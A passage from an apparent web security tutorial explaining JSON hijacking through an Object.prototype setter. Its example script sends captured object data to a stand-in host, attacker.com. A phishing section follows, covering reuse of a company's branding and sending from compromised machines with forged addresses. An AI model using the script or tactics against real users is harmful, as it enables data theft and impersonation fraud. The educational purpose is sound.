Web application security - the fast guide 1.1 | Page 103
Chapter 5 - Attack Execution the client
The victim opens the link, which sends a request to the attacker's website; that site serves a
page containing the following script:
Object.prototype.__defineSetter__("name", function(x) {
    var s = "";
    var f;
    // collect every enumerable property already assigned on this object
    for (f in this) {
        s += f + ": '" + this[f] + "', ";
    }
    s += "name: " + x;
    // send the collected information to the attacker's server
    document.images[0].src = "http://attacker.com/?data=" + s;
});
The previous listing defines a setter on Object.prototype for the property "name"; when the
browser evaluates the JSON response it fetched from the victim's service, the setter runs and
forwards the object's contents to the attacker's server.
This attack works only if the user is authenticated by cookie to the server hosting the JSON
service, so that the browser attaches the session cookie to the cross-site request.
5.15 Attack Execution - Phishing
Phishing falls under the category of trickery attacks: it depends mainly on faking the
appearance of a website or impersonating a company through an email message.
The attacker usually reuses the original company's theme and logo images to convince the
victim that the message comes from the company's legitimate email address.
To avoid being traced, the attacker sends the message from a compromised machine and uses a
forged sender address.
Attack requirement:
A. vict